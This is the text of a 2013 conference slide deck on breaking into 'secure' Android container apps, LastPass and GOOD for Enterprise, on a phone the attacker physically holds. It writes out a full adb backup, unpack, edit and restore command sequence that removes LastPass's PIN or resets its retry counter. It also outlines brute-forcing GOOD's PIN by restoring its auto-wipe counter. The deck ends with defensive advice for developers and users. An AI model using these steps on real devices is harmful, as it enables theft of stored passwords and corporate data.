Chris John Riley | 26.11.2013 | 2 Mobile Fail ::: Cracking open “secure” Android Containers

@ChrisJohnRiley > whoami

IT Security Analyst / Security Consultant

Raiffeisen Informatik GmbH

R-IT CERT Team

Regular conference speaker

DEF CON | Bsides | Hashdays | SecZone…

blog http://blog.c22.cc

Abject Failure (See Life for reference)

Chris John Riley | 26.11.2013 | 3 Mobile Fail ::: Cracking open “secure” Android Containers

THE WISEST MAN, IS

HE WHO KNOWS, THAT

HE KNOWS NOTHING

SOCRATES: APOLOGY, 21D

Chris John Riley | 26.11.2013 | 5 Mobile Fail ::: Cracking open “secure” Android Containers

Why

Scenario

How

Closer Look

Making it easy

Review

Chris John Riley | 26.11.2013 | 6 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 7 Mobile Fail ::: Cracking open “secure” Android Containers

WHY ?

Chris John Riley | 26.11.2013 | 9 Mobile Fail ::: Cracking open “secure” Android Containers

too much

information 01100100 01100101 01110010 01110000

01100100 01100101 01110010 01110000 01111001

01100100 01100101 01110010 01110000 01101001 01100101 01110011 01110100

Chris John Riley | 26.11.2013 | 12 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 13 Mobile Fail ::: Cracking open “secure” Android Containers

Containers

Multiple uses

Pa$$w0rd databases

Corporate mail containers

Secure notes / files

...

Chris John Riley | 26.11.2013 | 15 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 16 Mobile Fail ::: Cracking open “secure” Android Containers

but…

Chris John Riley | 26.11.2013 | 17 Mobile Fail ::: Cracking open “secure” Android Containers

The device

is insecure

Chris John Riley | 26.11.2013 | 18 Mobile Fail ::: Cracking open “secure” Android Containers

...or

worse

Chris John Riley | 26.11.2013 | 19 Mobile Fail ::: Cracking open “secure” Android Containers

BYOD *

* Bring Your Own Disease

Chris John Riley | 26.11.2013 | 21 Mobile Fail ::: Cracking open “secure” Android Containers

Solution?

Chris John Riley | 26.11.2013 | 22 Mobile Fail ::: Cracking open “secure” Android Containers

Move the

security closer

to the data!

Chris John Riley | 26.11.2013 | 23 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 24 Mobile Fail ::: Cracking open “secure” Android Containers

but…

Chris John Riley | 26.11.2013 | 25 Mobile Fail ::: Cracking open “secure” Android Containers

… I lost my

phone!

Chris John Riley | 26.11.2013 | 26 Mobile Fail ::: Cracking open “secure” Android Containers

314 mobile phones 'stolen

in London every day'

offenders traced three

or four times out of 10

Source: UK Metropolitan Police 01/2013

Chris John Riley | 26.11.2013 | 27 Mobile Fail ::: Cracking open “secure” Android Containers

state of

security Device

Chris John Riley | 26.11.2013 | 28 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 30 Mobile Fail ::: Cracking open “secure” Android Containers

KEEP CALM

Chris John Riley | 26.11.2013 | 31 Mobile Fail ::: Cracking open “secure” Android Containers

secure

containers

will save us

Chris John Riley | 26.11.2013 | 32 Mobile Fail ::: Cracking open “secure” Android Containers

… or not

Chris John Riley | 26.11.2013 | 33 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 34 Mobile Fail ::: Cracking open “secure” Android Containers

Sc nario .

Chris John Riley | 26.11.2013 | 35 Mobile Fail ::: Cracking open “secure” Android Containers

Scenario

• Given physical access to a device

• What security do “secure” containers provide

• temporary access (< 3 minutes)

• permanent access

Chris John Riley | 26.11.2013 | 38 Mobile Fail ::: Cracking open “secure” Android Containers

but…

Chris John Riley | 26.11.2013 | 39 Mobile Fail ::: Cracking open “secure” Android Containers

remember

Chris John Riley | 26.11.2013 | 40 Mobile Fail ::: Cracking open “secure” Android Containers

secure

containers

will SAVE us

Chris John Riley | 26.11.2013 | 41 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 42 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 43 Mobile Fail ::: Cracking open “secure” Android Containers

G ALS

Chris John Riley | 26.11.2013 | 44 Mobile Fail ::: Cracking open “secure” Android Containers

TL;DR

Chris John Riley | 26.11.2013 | 45 Mobile Fail ::: Cracking open “secure” Android Containers

pwn

secure

containers

Chris John Riley | 26.11.2013 | 46 Mobile Fail ::: Cracking open “secure” Android Containers

G AL MY NOT

Chris John Riley | 26.11.2013 | 47 Mobile Fail ::: Cracking open “secure” Android Containers

bypass

device PIN 12

34

Chris John Riley | 26.11.2013 | 48 Mobile Fail ::: Cracking open “secure” Android Containers

r00t the

device

Chris John Riley | 26.11.2013 | 49 Mobile Fail ::: Cracking open “secure” Android Containers

do anything

resembling…

Chris John Riley | 26.11.2013 | 50 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 51 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 52 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 53 Mobile Fail ::: Cracking open “secure” Android Containers

HOW ? O

Chris John Riley | 26.11.2013 | 54 Mobile Fail ::: Cracking open “secure” Android Containers

keep it simple

Chris John Riley | 26.11.2013 | 55 Mobile Fail ::: Cracking open “secure” Android Containers

Android

Debug

Bridge

Chris John Riley | 26.11.2013 | 56 Mobile Fail ::: Cracking open “secure” Android Containers

ADB – Android Debug Bridge

• Requires USB Debugging Enabled

• Doesn't require ROOTed device

• Root grants further access / makes things trivial

http://developer.android.com/tools/help/adb.html

Chris John Riley | 26.11.2013 | 57 Mobile Fail ::: Cracking open “secure” Android Containers

adb

functions

Chris John Riley | 26.11.2013 | 58 Mobile Fail ::: Cracking open “secure” Android Containers

ADB – Android Debug Bridge

• Allows application side-loading

• [un]install applications over adb

• Doesn’t require device to be active

• Can be PIN locked (for some functions)

• New security implemented in 4.3

http://developer.android.com/tools/help/adb.html

Chris John Riley | 26.11.2013 | 59 Mobile Fail ::: Cracking open “secure” Android Containers

ADB – Android Debug Bridge

• adb backup

• Backup Android device over adb (ICS onwards)

• -system → system data

• -apk → application apk

• Can backup specific application data individually

adb backup com.android.app -f backup.ab

http://developer.android.com/tools/help/adb.html

Chris John Riley | 26.11.2013 | 60 Mobile Fail ::: Cracking open “secure” Android Containers

• adb restore

• Restore Android backup over adb

• Restore specific application data individually

• with or without application (apk)

adb restore backup.ab

ADB – Android Debug Bridge

http://developer.android.com/tools/help/adb.html

Chris John Riley | 26.11.2013 | 61 Mobile Fail ::: Cracking open “secure” Android Containers

adb pull /sdcard/secret.txt secret.txt

ADB – Android Debug Bridge

• adb pull / push

• Copy data to / from device over adb

• Limited access for non-root users

• no access to application config without root

• Works on locked devices (PIN Protected)

http://developer.android.com/tools/help/adb.html

Chris John Riley | 26.11.2013 | 62 Mobile Fail ::: Cracking open “secure” Android Containers

ADB – Android Debug Bridge

• adb shell

• Shell access on device

• Send keys / taps

• Limited for non-root users

• Works on locked devices (PIN Protected)

http://developer.android.com/tools/help/adb.html

adb shell

Chris John Riley | 26.11.2013 | 63 Mobile Fail ::: Cracking open “secure” Android Containers

Supporting Tools

• openssl

• w/ zlib support

• star

• tar tool w/ added functionality we need

Chris John Riley | 26.11.2013 | 64 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 65 Mobile Fail ::: Cracking open “secure” Android Containers

Closer look

Chris John Riley | 26.11.2013 | 66 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 67 Mobile Fail ::: Cracking open “secure” Android Containers

lastpass

Chris John Riley | 26.11.2013 | 69 Mobile Fail ::: Cracking open “secure” Android Containers

lastpass

• Personal solution (w/ enterprise option)

• Uses online sync

• Can be secured with a PIN

• Can wipe data after 5 false logons

• Restricts screenshots

https://lastpass.com/android

Chris John Riley | 26.11.2013 | 70 Mobile Fail ::: Cracking open “secure” Android Containers

Can store lastpass.com password

• So users don't need to type it EVERY time

• Reduces security

• Makes it usable!

Chris John Riley | 26.11.2013 | 71 Mobile Fail ::: Cracking open “secure” Android Containers

Why store

the PW?

Chris John Riley | 26.11.2013 | 72 Mobile Fail ::: Cracking open “secure” Android Containers

_mySecur3L@sTp@$$p@$$w0rd1sDAb0mb&&&:

Easy to remember

Impossible to type!

Chris John Riley | 26.11.2013 | 73 Mobile Fail ::: Cracking open “secure” Android Containers

It's

though

OK

Chris John Riley | 26.11.2013 | 74 Mobile Fail ::: Cracking open “secure” Android Containers

You can

enable a

PIN!

Chris John Riley | 26.11.2013 | 75 Mobile Fail ::: Cracking open “secure” Android Containers

PIN Security

• Limited to 4 digits!

• “auto-Wipe” data

• after 5 false logons

Chris John Riley | 26.11.2013 | 76 Mobile Fail ::: Cracking open “secure” Android Containers

PIN ==

SECURE!

Chris John Riley | 26.11.2013 | 78 Mobile Fail ::: Cracking open “secure” Android Containers

AndroidManifest.xml

Chris John Riley | 26.11.2013 | 79 Mobile Fail ::: Cracking open “secure” Android Containers

<application android:allowBackup=“true”>

AndroidManifest.xml

Chris John Riley | 26.11.2013 | 80 Mobile Fail ::: Cracking open “secure” Android Containers

Default: true

Chris John Riley | 26.11.2013 | 81 Mobile Fail ::: Cracking open “secure” Android Containers

adb backup com.lastpass.lpandroid –f lp.ab

Chris John Riley | 26.11.2013 | 82 Mobile Fail ::: Cracking open “secure” Android Containers

What good is

an .ab file?

Chris John Riley | 26.11.2013 | 83 Mobile Fail ::: Cracking open “secure” Android Containers

Android Backup (.ab)

• zlib compressed (kinda)

• skip header (24 bytes)

• pipe to openssl w/zlib support

dd if=dropbox.ab bs=24 skip=1 | openssl zlib -d > dropbox.tar

Chris John Riley | 26.11.2013 | 86 Mobile Fail ::: Cracking open “secure” Android Containers

LPandroid.xml

• lastpass.com username

• laspass.com password (encoded)

• PIN (encoded)

• Settings

• ...

Chris John Riley | 26.11.2013 | 87 Mobile Fail ::: Cracking open “secure” Android Containers

<string name="reprompt_tries">

0

</string>

Chris John Riley | 26.11.2013 | 88 Mobile Fail ::: Cracking open “secure” Android Containers

That looks

interesting!

Chris John Riley | 26.11.2013 | 89 Mobile Fail ::: Cracking open “secure” Android Containers

( ) THEORY

Chris John Riley | 26.11.2013 | 90 Mobile Fail ::: Cracking open “secure” Android Containers

if reprompt_tries < 5:

prompt_for_pin()

else

drop_the_DBass()

end

Chris John Riley | 26.11.2013 | 91 Mobile Fail ::: Cracking open “secure” Android Containers

Theory

• reprompt_tries as iterator

• increases till it reaches 5

• Sounds reasonable

• edit the XML and restore it

• Let's set “reprompt_tries” to -9999 then ;)

Chris John Riley | 26.11.2013 | 92 Mobile Fail ::: Cracking open “secure” Android Containers

Proposed Attack

• Backup app data

• Edit XML

• set “reprompt_tries” to -9999

• Repackage

• Restore

Chris John Riley | 26.11.2013 | 93 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 94 Mobile Fail ::: Cracking open “secure” Android Containers

0 - adb backup com.lastpass.lpandroid -f lpass.ab

1 - dd if=lpass.ab bs=24 skip=1 | openssl zlib -d > lpass.tar

2 - tar -tf lpass.tar > lpass.list

3 - tar -xvf lpass.tar

4 - edit apps/com.lastpass.lpandroid/sp/LPandroid.xml

5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/

6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab

7 - openssl zlib -in lpass_new.tar >> lpass_new.ab

8 - adb restore lpass_new.ab

Chris John Riley | 26.11.2013 | 95 Mobile Fail ::: Cracking open “secure” Android Containers

Not the easiest

process...

Chris John Riley | 26.11.2013 | 96 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 97 Mobile Fail ::: Cracking open “secure” Android Containers

counter++

Chris John Riley | 26.11.2013 | 98 Mobile Fail ::: Cracking open “secure” Android Containers

good news…

Chris John Riley | 26.11.2013 | 99 Mobile Fail ::: Cracking open “secure” Android Containers

We get

tries 10,000

Chris John Riley | 26.11.2013 | 100 Mobile Fail ::: Cracking open “secure” Android Containers

bad news…

Chris John Riley | 26.11.2013 | 101 Mobile Fail ::: Cracking open “secure” Android Containers

We get

tries 10,000

Chris John Riley | 26.11.2013 | 102 Mobile Fail ::: Cracking open “secure” Android Containers

Let’s make it

easier

Chris John Riley | 26.11.2013 | 103 Mobile Fail ::: Cracking open “secure” Android Containers

No PIN > PIN

Chris John Riley | 26.11.2013 | 104 Mobile Fail ::: Cracking open “secure” Android Containers

<string name="passwordrepromptonactivate">0</string>

<string name="pincodeforreprompt"></string>

<string name="requirepin">0</string>

Chris John Riley | 26.11.2013 | 105 Mobile Fail ::: Cracking open “secure” Android Containers

PROFIT!

Chris John Riley | 26.11.2013 | 106 Mobile Fail ::: Cracking open “secure” Android Containers

Easier Attack

• Backup app data

• Edit XML

• remove PIN

• Repackage

• Restore

• WIN!

Chris John Riley | 26.11.2013 | 107 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 108 Mobile Fail ::: Cracking open “secure” Android Containers

for

points...

Chris John Riley | 26.11.2013 | 109 Mobile Fail ::: Cracking open “secure” Android Containers

Persistence

Chris John Riley | 26.11.2013 | 110 Mobile Fail ::: Cracking open “secure” Android Containers

Persistence

• Backup LastPass from device A

• Edit backup to remove PIN

• Rebuild backup

• Restore backup to device B

• Close & restart to re-sync changes from device A

• Profit?

Chris John Riley | 26.11.2013 | 111 Mobile Fail ::: Cracking open “secure” Android Containers

...but I

RESET my

password!

Chris John Riley | 26.11.2013 | 112 Mobile Fail ::: Cracking open “secure” Android Containers

PROFIT ++

Chris John Riley | 26.11.2013 | 113 Mobile Fail ::: Cracking open “secure” Android Containers

...

Chris John Riley | 26.11.2013 | 114 Mobile Fail ::: Cracking open “secure” Android Containers

GOOD for enterprise

Chris John Riley | 26.11.2013 | 115 Mobile Fail ::: Cracking open “secure” Android Containers

GOOD

• Enterprise email solution

• Email | Contacts | intranet Browser | …

• Secured with a PIN or password

• enterprise policy

• Wipes data/device after 10 false logons

https://www.good.com

Chris John Riley | 26.11.2013 | 116 Mobile Fail ::: Cracking open “secure” Android Containers

Adv. security features

• Double encryption

• SSL Tunnel + Encrypted contents

• Full MDM solution

• Password Policies

• …

• r00t detection

• emulator detection

• advanced detection

https://www.good.com

Chris John Riley | 26.11.2013 | 117 Mobile Fail ::: Cracking open “secure” Android Containers

Lost device (BYOD)

• Can an attacker prevent secure wipe

• Can an attacker access cached data

Chris John Riley | 26.11.2013 | 118 Mobile Fail ::: Cracking open “secure” Android Containers

PROBLEM

Chris John Riley | 26.11.2013 | 119 Mobile Fail ::: Cracking open “secure” Android Containers

unlike

LastPass

Chris John Riley | 26.11.2013 | 120 Mobile Fail ::: Cracking open “secure” Android Containers

preferences are

encrypted

Chris John Riley | 26.11.2013 | 121 Mobile Fail ::: Cracking open “secure” Android Containers

PROBLEM

Chris John Riley | 26.11.2013 | 122 Mobile Fail ::: Cracking open “secure” Android Containers

…after 10 false logons auto-wipe

Chris John Riley | 26.11.2013 | 123 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 124 Mobile Fail ::: Cracking open “secure” Android Containers

Disable PIN

Chris John Riley | 26.11.2013 | 125 Mobile Fail ::: Cracking open “secure” Android Containers

auto-wipe counter

Chris John Riley | 26.11.2013 | 126 Mobile Fail ::: Cracking open “secure” Android Containers

brute-force

Chris John Riley | 26.11.2013 | 127 Mobile Fail ::: Cracking open “secure” Android Containers

but…

Chris John Riley | 26.11.2013 | 128 Mobile Fail ::: Cracking open “secure” Android Containers

<application android:allowBackup=“true”>

AndroidManifest.xml

Chris John Riley | 26.11.2013 | 130 Mobile Fail ::: Cracking open “secure” Android Containers

THEORY

Chris John Riley | 26.11.2013 | 131 Mobile Fail ::: Cracking open “secure” Android Containers

Theory

• Auto-wipe counter

• Stored IN app data somewhere

Chris John Riley | 26.11.2013 | 132 Mobile Fail ::: Cracking open “secure” Android Containers

THEORY

Chris John Riley | 26.11.2013 | 133 Mobile Fail ::: Cracking open “secure” Android Containers

adb restore

Chris John Riley | 26.11.2013 | 134 Mobile Fail ::: Cracking open “secure” Android Containers

over write

auto-wipe

counter

Chris John Riley | 26.11.2013 | 135 Mobile Fail ::: Cracking open “secure” Android Containers

#fa

ce

palm

Chris John Riley | 26.11.2013 | 136 Mobile Fail ::: Cracking open “secure” Android Containers

brute-force

Chris John Riley | 26.11.2013 | 137 Mobile Fail ::: Cracking open “secure” Android Containers

Naïve Attack

• Backup app data

• until good.unlock?

• Try 9 PINS

• Restore app data

Chris John Riley | 26.11.2013 | 138 Mobile Fail ::: Cracking open “secure” Android Containers

PROBLEM

Chris John Riley | 26.11.2013 | 139 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 140 Mobile Fail ::: Cracking open “secure” Android Containers

Naïve Attack timing

* 18.75 ppm ~ 50% keyspace

• 4 digit PIN

• est. 4.5 hours*

• 6 digit PIN

• est. 18.5 days*

• 8 digit PIN

• est. 5 years*

Chris John Riley | 26.11.2013 | 141 Mobile Fail ::: Cracking open “secure” Android Containers

Naïve Attack timing

• 4 lower alphanum

• est. 31 days*

• 6 lower alphanum

• est. 3 years*

• 8 lower alphanum

• est. 110 years*

* 18.75 ppm ~ 50% keyspace

Chris John Riley | 26.11.2013 | 142 Mobile Fail ::: Cracking open “secure” Android Containers

Naïve Attack timing

• 4 mixed alphanum

• est. 1 year*

• 6 mixed alphanum

• est. 46.5 years*

• 8 mixed alphanum

• est. 2880 years*

* 18.75 ppm ~ 50% keyspace

Chris John Riley | 26.11.2013 | 143 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 144 Mobile Fail ::: Cracking open “secure” Android Containers

Device

CONTAINER

Chris John Riley | 26.11.2013 | 145 Mobile Fail ::: Cracking open “secure” Android Containers

Device

CONTAINER

Chris John Riley | 26.11.2013 | 146 Mobile Fail ::: Cracking open “secure” Android Containers

Device

CONTAINER

Chris John Riley | 26.11.2013 | 147 Mobile Fail ::: Cracking open “secure” Android Containers

#fa

ce

palm

#fa

ce

palm

Chris John Riley | 26.11.2013 | 148 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 151 Mobile Fail ::: Cracking open “secure” Android Containers

Adv. Attack

• Automate PIN + restore

• adb shell input text

• adb shell input keyevent

• adb shell input tap

Chris John Riley | 26.11.2013 | 152 Mobile Fail ::: Cracking open “secure” Android Containers

Minimize keyspace

• Password Rules

• No sequenced numbers (e.g. 4567)

• No duplicate numbers (e.g. 1111)

• Result

• Reduced keyspace

Chris John Riley | 26.11.2013 | 153 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 154 Mobile Fail ::: Cracking open “secure” Android Containers

PROFIT!

Chris John Riley | 26.11.2013 | 155 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 156 Mobile Fail ::: Cracking open “secure” Android Containers

Making it easy

Chris John Riley | 26.11.2013 | 157 Mobile Fail ::: Cracking open “secure” Android Containers

methodology

• Common methodology

• Backup (adb)

• Extract

• Examine

• Edit

• Repack

• Restore (adb)

← here be dragons

← bypass all the things

Chris John Riley | 26.11.2013 | 158 Mobile Fail ::: Cracking open “secure” Android Containers

remember this

process?

Chris John Riley | 26.11.2013 | 159 Mobile Fail ::: Cracking open “secure” Android Containers

0 - adb backup com.lastpass.lpandroid -f lpass.ab

1 - dd if=lpass.ab bs=24 skip=1 | openssl zlib -d > lpass.tar

2 - tar -tf lpass.tar > lpass.list

3 - tar -xvf lpass.tar

4 - edit apps/com.lastpass.lpandroid/sp/LPandroid.xml

5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/

6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab

7 - openssl zlib -in lpass_new.tar >> lpass_new.ab

8 - adb restore lpass_new.ab

Chris John Riley | 26.11.2013 | 160 Mobile Fail ::: Cracking open “secure” Android Containers

Say that 10

times fast!

Chris John Riley | 26.11.2013 | 162 Mobile Fail ::: Cracking open “secure” Android Containers

automation

Chris John Riley | 26.11.2013 | 163 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 164 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 165 Mobile Fail ::: Cracking open “secure” Android Containers

ab_unpacker.py

https://github.com/ChrisJohnRiley/Random_Code

Chris John Riley | 26.11.2013 | 166 Mobile Fail ::: Cracking open “secure” Android Containers

ab_packer.py

https://github.com/ChrisJohnRiley/Random_Code

Chris John Riley | 26.11.2013 | 167 Mobile Fail ::: Cracking open “secure” Android Containers

Makes

0wning

things

Chris John Riley | 26.11.2013 | 168 Mobile Fail ::: Cracking open “secure” Android Containers

200 / quicker

1000 / funner

o o

o o

Chris John Riley | 26.11.2013 | 169 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 172 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 173 Mobile Fail ::: Cracking open “secure” Android Containers

RE VIEW

Chris John Riley | 26.11.2013 | 174 Mobile Fail ::: Cracking open “secure” Android Containers

“secure”containers

!= SECURE containers

Chris John Riley | 26.11.2013 | 175 Mobile Fail ::: Cracking open “secure” Android Containers

Physical

access

Chris John Riley | 26.11.2013 | 177 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 178 Mobile Fail ::: Cracking open “secure” Android Containers

IT

Chris John Riley | 26.11.2013 | 179 Mobile Fail ::: Cracking open “secure” Android Containers

Developers

Chris John Riley | 26.11.2013 | 180 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 181 Mobile Fail ::: Cracking open “secure” Android Containers

android.allowBackup

http://developer.android.com/guide/topics/data/backup.html

Chris John Riley | 26.11.2013 | 182 Mobile Fail ::: Cracking open “secure” Android Containers

Some devs

GET it!

Chris John Riley | 26.11.2013 | 183 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 184 Mobile Fail ::: Cracking open “secure” Android Containers

pref files

Chris John Riley | 26.11.2013 | 185 Mobile Fail ::: Cracking open “secure” Android Containers

Securing Apps

• Preference files are NOT secret

• Encrypt preference data

• ONLY store encrypted passwords

• No XOR / base64 please

• Don’t TRUST the config

• HMAC | Sign | Encrypt

Chris John Riley | 26.11.2013 | 186 Mobile Fail ::: Cracking open “secure” Android Containers

android

backup

Chris John Riley | 26.11.2013 | 187 Mobile Fail ::: Cracking open “secure” Android Containers

Securing Apps

• Disallow Android Backup

• if you don’t absolutely need it!

<application android:allowBackup=“false”>

Chris John Riley | 26.11.2013 | 188 Mobile Fail ::: Cracking open “secure” Android Containers

extra

security

Chris John Riley | 26.11.2013 | 189 Mobile Fail ::: Cracking open “secure” Android Containers

Extra Security

• USB Debugging

• Disable app when activated

• Root makes these hack easier still

• edit/read preference files on device itself

• ROOT detection is too basic

• easy to fool

Chris John Riley | 26.11.2013 | 190 Mobile Fail ::: Cracking open “secure” Android Containers

users e

nd

Chris John Riley | 26.11.2013 | 191 Mobile Fail ::: Cracking open “secure” Android Containers

Users

• Encrypt your device

• Encrypts ADB backups

• Need to enter same passcode on backup screen

• Disable USB Debugging

• protects against adb pull/push attacks

• Don’t loose your phone ;)

Chris John Riley | 26.11.2013 | 192 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 193 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 194 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 195 Mobile Fail ::: Cracking open “secure” Android Containers

Question time

Chris John Riley | 26.11.2013 | 196 Mobile Fail ::: Cracking open “secure” Android Containers

Chris John Riley | 26.11.2013 | 197 Mobile Fail ::: Cracking open “secure” Android Containers

Thank you for your attention!

Vielen Dank für Ihre Aufmerksamkeit!

Raiffeisen Informatik GmbH

Lilienbrunngasse 7-9

A-1020 Wien

T +43 1/99 3 99 - 0

F +43 1/99 3 99 - 1100

E info@r-it.at

www.raiffeiseninformatik.at